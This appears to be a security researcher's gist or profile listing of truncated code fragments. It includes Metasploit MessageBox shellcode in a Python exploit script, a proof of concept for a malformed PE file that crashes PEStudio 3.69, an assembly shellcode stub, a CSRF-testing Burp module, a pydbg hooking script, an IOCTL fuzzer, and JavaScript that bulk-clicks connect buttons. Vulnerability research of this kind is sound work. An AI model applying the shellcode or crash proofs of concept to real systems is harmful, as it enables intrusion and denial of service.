debasishm89

Crash Stack Trace:

0:000> kb
ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
0012eaa0 275c8a0a 0012eacc 00208008 00008282 MSCOMCTL!DllGetClassObject+0x41a87
0012ead4 27583c30 00000000 01000000 c279eb90 MSCOMCTL!DllGetClassObject+0x41cc6
00000000 00000000 00000000 00000000 00000000 MSCOMCTL!DllCanUnloadNow+0xc7d

debasishm89

from pefile import PE
from struct import pack
# windows/messagebox - 265 bytes
# http://www.metasploit.com
# ICON=NO, TITLE=W00t!, EXITFUNC=process, VERBOSE=false, 
# TEXT=Debasish Was Here!
sample_shell_code = ("\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64" +
"\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e" +
"\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60" +
"\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b" +

debasishm89

# Title: PEStudio Version 3.69 Denial of Service
# Date: 5th June 2013
# Author: Debasish Mandal ( https://twitter.com/debasishm89 )
# Blog : http://www.debasish.in/
# Software Homepage: http://www.winitor.com/
# Version: PEStudio Version 3.69
# Tested on: Windows XP SP2 / Windows 7
# Vendor Patch : Recently released stable version (v6.91) is not affected.
 
'''

debasishm89

; Sample shellcode that will pop a MessageBox
; with custom title and text
; Written by Peter Van Eeckhoutte
; http://www.corelan.be:8800


[Section .text]
[BITS 32]

global _start

debasishm89

#POC
#c:\python27
junk = "\x41"
header = "MZ"
header += junk * 58
header += "\x80"
header += "\x00" * 3
header += junk * 64
header += "PE"
header += "\x00"*2

debasishm89

#include <windows.h>
__declspec(naked) EvilFunction()
{
          /*
          0007FA18   01001FC4  Ä.
  /CALL to MessageBoxW from notepad.01001FBE
          0007FA1C   001503C8  È.  |hOwner = 001503C8 ('Find',class='#32770',parent=003C029E)
          0007FA20   000A3A88  ˆ:..  |Text = "Cannot find "junk""
          0007FA24   000A8F34  4..  |Title = "Notepad"
          0007FA28   00000040  @...  \Style = MB_OK|MB_ICONASTERISK|MB_APPLMODAL
          */                                       

debasishm89

from rawweb import *
def main(raw_stream,ssl):
	'''
	This Burpy module is specially written to find CSRF vulnerability in Facebook Application.
	It has already found few minor CSRF vulnerability in FB application. Few them was qualifed for Bug Bounty.
	It simply checks whether CSRF token validation is present in Server Side or not by removing token 
from request and replaying it.Facebook application always throws a generic error message for CSRF error which is 
"Please try closing and re-opening your browser". If this error is not present in response after removing the token 
it returns +ve.
	'''

debasishm89

import re
import sys
import pefile
from pydbg import *
from pydbg.defines import *

def parseidalog(file):
	all_funcs = []
	f = open(file)
	funcs = f.readlines()

debasishm89

var tok = window.setInterval(function() {
	var total_req = 100;//change it to 200,300 etc..to send request to 200,300 people at a time. May slowdown network
	var all = document.getElementsByClassName('vcard-button bt-connect bt-primary')
	if (all.length < total_req)
		document.body.scrollTop = document.body.scrollHeight;
	else{
		clearInterval(tok);window.scrollTo(0,0);
		for(var i = 0 ; i <= all.length; i++){
			all[i].click();}
}}, 2000);

debasishm89

'''
 
Author : Debasish Mandal
Blog :http://www.debasish.in/
Twitter : https://twitter.com/debasishm89
 
A mutation based user mode (ring3) dumb in-memory IOCTL Fuzzer/Logger.
This script attach it self to any given process and hooks DeviceIoControl!Kernel32 API and
try to log or fuzz all I/O Control code I/O Buffer pointer, I/O buffer length that
process sends to any Kernel driver.